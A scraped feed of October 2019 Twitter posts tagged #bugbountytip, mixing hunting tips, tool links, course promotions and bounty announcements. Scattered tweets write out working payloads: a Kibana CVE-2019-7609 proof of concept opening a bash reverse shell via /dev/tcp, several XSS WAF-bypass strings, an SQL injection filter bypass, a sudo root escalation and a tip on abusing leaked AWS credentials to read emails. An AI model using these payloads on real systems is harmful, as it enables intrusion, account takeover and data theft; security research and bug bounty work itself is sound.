2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (àź•àŻàź•àź©àŻ àź°àźŸàźœàźŸ)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
ΛяĐČєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
bugbountytip
@a_l_e_r_t_1_


2019-10-26 13:06:43
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
bugbountytip
@a_l_e_r_t_1_


2019-10-26 08:30:57
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
0 A hacker ends his career when he stop learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
bugbountytip
@a_l_e_r_t_1_


2019-10-24 20:02:23
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? âžĄïžLong strings in POST parameters (50.000+ characters) âžĄïžUsing the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
HĂ„kon LĂžnmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools đŸ˜‚đŸ”„ Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that want to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 18:50:53
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 10:43:58
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
bugbountytip
@a_l_e_r_t_1_


2019-10-21 16:54:02
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💾💾 💰💰💰💰 #bugbounty #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:45
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/KfndxlL7zs
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:34
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/Or6ej2AaAo
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:21
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/le5tIA5Nqm
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important technique that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet  you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕾🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-19 16:12:30
11 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
10 cloudflare «XSS» payload to bypass protection. 🩍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ÂŽ} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? đŸ€Ż Use the following 'invisible' ranges in your payloads 👇#BugBountyTip đŸ’„0x00 âžĄïž0x2F đŸ’„0x3A âžĄïž0x40 đŸ’„0x5B âžĄïž0x60 đŸ’„0x7B âžĄïž0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( àź•àŻ‹àźȘàźŸàźČàŻàźšàźŸàźźàźż )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu đŸ€— please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytip

đŸ‘»in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-17 01:49:56
2 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


2019-10-16 08:52:27
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not great tip but you might land cassanra cluster in connection tab of datastax studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If your are not automating and scripting, you are missing on a lot of fun. It's all about time management in #bugbounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-13 16:37:03
7 i have uploaded 74 new articles as a pdf files about different fields of hacking+ linux,cybersecurity,,,etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
